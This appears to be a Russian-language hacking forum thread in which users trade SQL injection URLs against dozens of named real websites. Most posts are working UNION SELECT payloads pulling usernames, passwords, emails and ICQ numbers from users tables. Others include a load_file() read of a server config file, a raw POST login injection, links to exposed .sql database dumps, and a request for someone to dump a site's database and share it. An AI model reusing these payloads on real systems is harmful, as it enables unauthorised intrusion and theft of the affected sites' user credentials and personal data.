А в чем смысл этой ошибки, если не секрет? Где здесь скуль-инж? Как его применить? http://www.calibra-club.ru/profileclub.php?mode=viewprofile&u=17' Правда дальше раскопать не получилось. Такое чувство, что это не скуль, а подстава.
http://test.acunetix.com/artists.php?artist=3333 union select 111,222,333/*- Так просто разберался со сканером, вот решил посмотреть что они предлагают для тестирования)))
Два провайдера: http://medialite-net.ru/about\' http://sknt.ru В cookies: KEngineSession: \' union select 1,2,3,4,5/*
la2info.ru Code: _http://la2info.ru/db.php?action=npcs[COLOR=Red](АМПЕРСАНД)[/COLOR]npcid=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34/* P.S. с амперсандом фигня какая-то, не отображается.
http://www.supercomputingonline.com/article.php?sid=2252 http://www.worthplaying.com/article.php?sid=31196 http://www.gamingreport.com/article.php?sid=21543
server version for the right syntax to use near '-10, 10' at line 1 ИМХО скуль в LIMIT находится, смысла поэтому в нем не много. Для тех кто хочет покопаться в Postgresql: http://club.veresk.ru/?part_id=18-1%20union%20select%20version()
Вот нашел: http://www.britishcat.ru/articles.html?Action=ShowArticle&Article=8-1+union+select+111,222,333,444,555/* После 20 мин получилось вот такое )) : Code: http://www.britishcat.ru/articles.html?Action=ShowArticle&Article=8-1+union+select+111,222,333,444,CONCAT('ID=',id,'%20Login=',Login,'%20Passord=',password,'%20Mail=',%20email,'%20ICQ=',icq)+from+users/* Может, кто захочет дальше поковырять.
Sql на www.territory.ru POST http://www.territory.ru/info/news/index.php?show=cat&id=0 HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.territory.ru Content-Length: 57 Connection: Close Pragma: no-cache show=login&login='&[email protected] 2 Tem Если сможешь тут слить базу, ОЧЕНЬ буду признателен, если скинешь ее и мне. 8)
https://secure.mysociety.org/ cvstrac/getfile/mysociety/twfy/db/users.sql home.southernct.edu/~dorrt1/work/lablog/admins.sql members.home.nl/j.fridzema/database.sql
Вот, поднакопилось. Code: http://www.4webhelp.net/tutorials/?cid=9%20union%20select%201,2,user_password,4,5,6%20from%20users/* http://www.ipworld.only.pl/portal/articles.php?topic=-18%20union%20select%20111,pass,333,444,555%20from%20users/*- http://www.gamersinfo.net/content/news.php?id=-168%20union%20select%20111,username,password,email,555,666,777,888,999%20from%20user/*- http://www.dailynews-tsn.com/news.php?id=2163'%20union%20select%201,2,3,4,5,6,7,8,9,load_file('/home2/tsnweb/dailynews-tsn-www/db_fns.php'),1,2,3,4,5,6,7,8,9%20from%20tsn_members/*- http://www.dynamomania.com/news.php?p=message&id=-20242%20union%20select%201,2,email,pwd,5,6%20from%20users%20limit%203,4/* http://www.foodheart.org/news/news.php?id=55555555555%20union%20select%201,username,3,password,5,6,7,8,9%20from%20users/*- http://staging.aiap.it/news.php?ID=-754%20union%20select%201,2,3,4,5,6,7,8/*- http://webpagemaintenance.com/article.php?id=444444444444444%20union%20select%20111,222/*- http://www.nasar.org/nasar/news.php?id=6666666666666%20union%20select%201,2,email,password%20from%20users/*- http://www.hispanicprwire.com/news.php?l=in&id=-640%20union%20select%201,2,3,4,5,6/* http://www.losingtoday.com/news.php?id=-1475%20union%20select%201,2,3,4,5,6,7,8,9,0/* http://www.agh.edu.pl/news.php?id=-389%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5/* http://www.reusablebags.com/news.php?id=-17%20union%20select%201,email,3,4,5,6,7,8,9%20from%20orders/* http://www.statistica.md/news.php?lang=ru&id=12666666666%20union%20select%201,2,3,4,5,6,7,8,9,0,1/* http://kmi4schools.e2bn.net/rostra/news.php?r=1&t=2&id=555555555%20union%20select%201,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,0,1,2,3%20from%20account/* http://fat-cat.co.uk/fatcat/news.php?id=44444444444%20union%20select%201,22,33,4,5,6,7,8,9,0,1,2/*
а вот на wap.wab.ru при отправке письма выдает: Ошибка при отправке письма! Попробуйте еще раз. ERROR You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'Юзернейм')and(idtowhom = '515488')and(topic = ''') limit 1' at lin
Вот нашел только вот толку маловато наверно, так как я не могу найти таблицу users _http://www.yuretz.ru/prikol.php?id=470+union+select+0,1,2,3,4,5,6,7,8,9,10,11/*
